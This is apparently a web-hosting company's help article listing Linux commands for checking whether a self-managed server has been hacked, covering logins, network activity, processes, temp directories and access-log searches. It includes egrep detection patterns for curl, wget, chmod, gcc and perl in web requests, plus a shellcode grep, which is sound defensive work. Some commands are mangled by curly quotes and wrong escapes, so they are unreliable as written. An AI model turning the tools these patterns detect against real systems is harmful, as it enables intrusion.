Security

Checking Hacked Server


Categories of server:

 

1.1 Webair managed client server: Webair will perform a variety of custom configuration, maintenance, and optimization your server for maximum performance and reliability. A list of fully managed services  can be found at http://www.webair.com/

 

1.2 Self Managed client : The server owner becomes responsible of managing their own server.  As a self managed client, the owner can customize their own severs, has root access to servers,can install whatever applications and software desired. As well, self managed servers need to Apply their own OS and application updates and configuration  for security and performance . Other server maintenance on host files ,email settings, and performance of server security functions will become reliant to the owner .

 

If you are a self managed client and want some very useful commands to check if your server is hacked, please check below.  If you are a Webair Managed Client, we already do this for you!

 

 


 

Who is on the Server:

$ w

$ netstat -nalp | grep “:22″

OR

$ w && netstat -nalp | grep “:22″

The above commands will say who are all logged into the server.

Who was on the Server

$ last

$ cat /var/log/secure* | grep ssh | grep Accept

$ cat /var/log/secure* | grep ftp | grep Accept

Check what is the Current Network Activity of your server

$ netstat -nalp

$ nmap localhost

OR

$ netstat -nalp && nmap localhost

What Processes are Running:
$ ps -elf

$ ls /proc/*/exe -la

What Files are in the Common Attack Points:

$ ls /tmp -la

$ ls /var/tmp -la

$ ls /dev/shm -la

These are all the common unsecured places where the hacker intrudes into your linux server.

Don’t delete any thing or make changes just yet, just catalog every thing. Do not access a file with cat or strings, catalog the files and save that for later. Once you start deleting things you can no longer further investigate as to how deep they have penetrated. Don’t be fooled into seeing a common Apache compromise and think it ended there. Many times that was just the broken window they used to get in the first time, meanwhile they are tunneling deeper trying to get into root access.

What version of Linux is running

$ cat /etc/redhat-release

For non Red-Hat Linux

$ cat /etc/issue

Compare this to the kernel

$ uname -a

and

$ cat /proc/version

Who is the author of the file:

$ ls -la –author

When was the last time the file has been accessed and by who:

$ ls -l –time=access

Before you run off and use the cat command it is good to first check the file type with the file command. Many times I myself have been fooled in seeing a marked file  as something .html and finding that it was really a binary file.

What kind of file is it(ASCII or Binary):

$ file filename

OR

$ file /path/to/directory/*

You have been trying to be sneaky and not have any obvious virus scan running in the process list so as to not be detected, but that is tedious work and slow.

Update the Locate Database:

$ updatedb &

If this is a web server then the next thing to hunt for is signs of Apache exploits and SQL injection scripts. This nice little script was handed down to me from a co-worker and does a nice job of hunting through the log files rather than the long tedious work of searching manually.

Search for Apache Exploit :

$ for i in ´locate access_log´; do echo $i; egrep -i ‘(chr(|system()|(curl|wget|chmod|gcc|perl)%20′ $i; done

OR

$ egrep -i ‘(chr(|system()|(curl|wget|chmod|gcc|perl)%20′ /path/to/log/files/*

cPanel :

$ egrep -i ‘(chr(|system()|(curl|wget|chmod|gcc|perl)%20′ /usr/local/apache/logs/*

$ egrep -i ‘(chr(|system()|(curl|wget|chmod|gcc|perl)%20′ /home/*/statistics/logs/*

Ensim:

egrep -i ‘(chr(|system()|(curl|wget|chmod|gcc|perl)%20’/home/virtual/site*/fst/var/log/httpd/*

Plesk :
$ egrep -i ‘(chr(|system()|(curl|wget|chmod|gcc|perl)%20′ /home/httpd/vhosts/*/statistics/logs/*

$ egrep -i ‘(chr(|system()|(curl|wget|chmod|gcc|perl)%20′ /var/log/httpd/*

Search for Shell Code:
$ cat /path/to/access/logs/* | grep “/x90/”

 

Related Articles

  • Scanning for rootkits and possible exploits – RKHunter

    Rootkits are malicious softwares that are installed by intruders to gain access to your server once the security of the server has been breached.  Intruders can leave some malicious softwares...
  • Whitelist FTP IP

    Webair blocks all FTP access on[label color=”primary”] Managed Dedicated, VPS, and Cloud servers[/label]. This is for secure FTP access to prevent unauthorized access and hacking attempts. If you need FTP...
  • Patching The Ghost Vulnerability

    The Ghost vulnerability, also known as CVE-2015-0235, is an exploit in a library named glibc. This library is referenced by many applications which run on your server. The exploit is...
  • What is an Account Passphrase?

      Webair offers an extra layer of security to our clients when calling in regarding support called an Account Passphrase. This will be asked when calling into our phone support...